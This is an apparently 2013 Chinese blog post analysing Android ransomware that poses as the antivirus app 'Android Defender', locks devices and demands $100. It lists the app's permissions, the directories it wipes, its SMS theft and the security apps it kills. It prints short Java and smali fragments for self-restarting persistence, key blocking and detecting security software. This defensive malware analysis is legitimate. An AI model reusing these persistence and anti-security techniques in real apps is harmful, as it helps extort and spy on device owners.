您的位置:首页 > 移动开发 > Android开发

在Android平台上发现新的恶意程序伪装成杀毒软件挟持设备

2013-06-25 10:33 711 查看
Android平台恶意程序:不支付$100隐私就泄漏】6月25日消息,安全公司赛门铁克发布报告,在Android平台上发现新的恶意程序伪装成杀毒软件挟持设备,消费者支付$100才能让设备正常运作。这些恶意程序抓住消费者寻求安全心态,误导消费者删除虚假或不存在木马恶意程序,进而控制整台设备来威胁机主。

另外这个软件不是通过Google play发布的,因此大家要谨慎选择来源选型。。不要安装未知来源,或者从正规电子商城下载啊!

软件入口,智能终端安全的最本质!!



其实以前就有这样的样本,逼着用户非得捐赠的。。。。比如下面的代码:

public boolean onKeyDown(int keyCode, KeyEvent event) {

return true;
}

protected void onDestroy() {
super.onDestroy();
startService(new Intent(getApplicationContext(), RestartService.class));
}

public void onCreate() {
super.onCreate();
startActivity(new Intent(getApplicationContext(), MaliciousActivity.class)
.addFlags(Intent.FLAG_ACTIVITY_NEW_TASK));
}
上述代码仅供说明,切勿模拟实战。。。。

下面是这个勒索软件的界面:



把自己打扮成圣斗士了,一下子提示这么多危险,然后索要保护费。。。
Package name: com.android.defender.androiddefender
安装完的桌面图标是:



申请的权限:尼玛真多啊

Access location information, such as Cell-ID or WiFi.
Access location information, such as GPS information.
Access information about networks.
Access information about the WiFi state.
Change network connectivity state.
Change Wi-Fi connectivity state.
Allows applications to disable the keyguard. 允许程序禁用键盘锁
(Expand or collapse the status bar.
Access to the list of accounts in the Accounts Service.
Open network connections.
Ends background processes. 结束进程
Read user's contacts data.
Check the phone's current state.
Read SMS messages on the device.
Start once the device has finished booting. 自启动
Open windows.
Make the phone vibrate.
Prevent processor from sleeping or screen from dimming.
Create new contact data.
Write to external storage devices.
Create new SMS messages.
Install a shortcut

还激活了设备管理。。。



删除这些目录的apk。。这是防止下载杀毒软件吗?

[EXTERNAL STORAGE MEDIA]/Download
/mnt/external_sd/Download
/mnt/extSdCard/Download

创建 SQLite 数据库: droidbackup.db ,窃取系统短信。

设备锁定时弹出这个界面。。。伪道士!!!



把其他的兄弟进程都干掉!

com.rechild.advancedtaskkiller
com.estrongs.android.pop
com.metago.astro
com.avast.android.mobilesecurity
com.estrongs.android.taskmanager
com.gau.go.launcherex.gowidget.taskmanagerex
com.gau.go.launcherex
com.rechild.advancedtaskkillerpro
mobi.infolife.taskmanager
com.rechild.advancedtaskkillerfroyo
com.netqin.aotkiller
com.arron.taskManagerFree
com.rhythm.hexise.task

然后。。。尼玛,楼主中剧毒了,全世界最流行的都中了!



开始要钱了!!!



还是打折价格。。



卸载很困难,阻止别的应用启动,这个以前的恶意软件就有。这是以前一个软件的代码!

.method public static b(Landroid/content/Context;)Ljava/lang/String;
.locals 4
const/4 v2, 0x0
//the encrypted regular expression to match the package name of security software
//(^com\.qihoo360\.mobilesafe$)|(^com\.tencent\.qqpimsecure$)|(^com\.lbe\.security$)
const-string v0, "ZkBw8CLr9ek1HtMhfN7YKvBg8CF18t3N7xzRFvRAZkBw8CLr9eiR8I0R8eir9eksrtRgrC3wu
KFRFvRAZkBw8CLr9IsWz3YOrC3wuKF1uoDDZl__"
//decrypt this string
invoke-static v0, Lcom/sec/android/providers/drm/However;->d(Ljava/lang/String;)Ljava/lang/String;
move-result-object v0
invoke-virtual p0, Landroid/content/Context;->getPackageManager()Landroid/content/pm/PackageManager;
move-result-object v1
invoke-virtual v1, v2, Landroid/content/pm/PackageManager;->getInstalledPackages(I)Ljava/util/List;
move-result-object v1
:goto_0
invoke-interface v1, Ljava/util/List;->size()I
move-result v3
//traverse the list of installed packages.
if-ge v2, v3, :cond_1
invoke-interface v1, v2, Ljava/util/List;->get(I)Ljava/lang/Object;
move-result-object p0
check-cast p0, Landroid/content/pm/PackageInfo;
iget-object v3, p0, Landroid/content/pm/PackageInfo;->packageName:Ljava/lang/String;
invoke-static v3, v0, Lcom/sec/android/providers/drm/However;->a
(Ljava/lang/String;Ljava/lang/String;)Ljava/lang/String;
move-result-object v3
if-eqz v3, :cond_0
iget-object v0, p0, Landroid/content/pm/PackageInfo;->packageName:Ljava/lang/String;
:goto_1
//find the security software. return its package name.
return-object v0
:cond_0
//otherwise, check next package.
add-int/lit8 v2, v2, 0x1
goto :goto_0
:cond_1
const/4 v0, 0x0
goto :goto_1
.end method

甚至修改了系统设置,连factory data reset 都不可以。后两者等我的源代码分析。
内容来自用户分享和网络整理,不保证内容的准确性,如有侵权内容,可联系管理员处理 点击这里给我发消息
标签: